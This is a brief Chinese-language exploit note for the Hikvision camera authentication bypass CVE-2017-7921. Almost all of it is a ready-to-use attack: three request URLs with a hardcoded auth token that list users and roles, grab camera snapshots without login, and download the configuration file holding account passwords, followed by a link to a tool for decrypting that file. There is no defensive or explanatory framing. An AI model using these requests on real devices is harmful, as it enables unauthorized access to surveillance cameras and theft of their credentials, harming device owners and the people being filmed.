海康威視(Hikvision)登陸繞過CVE-2017-7921
1、檢索所有用戶及其角色的列表
http://ip/Security/users?auth=YWRtaW46MTEK
2、在沒有身份驗證的情況下獲取攝像頭快照
http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK
3、下載攝像頭配置賬號密碼文件
http://ip/System/configurationFile?auth=YWRtaW46MTEK
4、下載后解密即可,二進制文件使用HEX編輯器查看
解密軟件下載地址
https://github.com/WormChickenWizard/hikvision-decrypter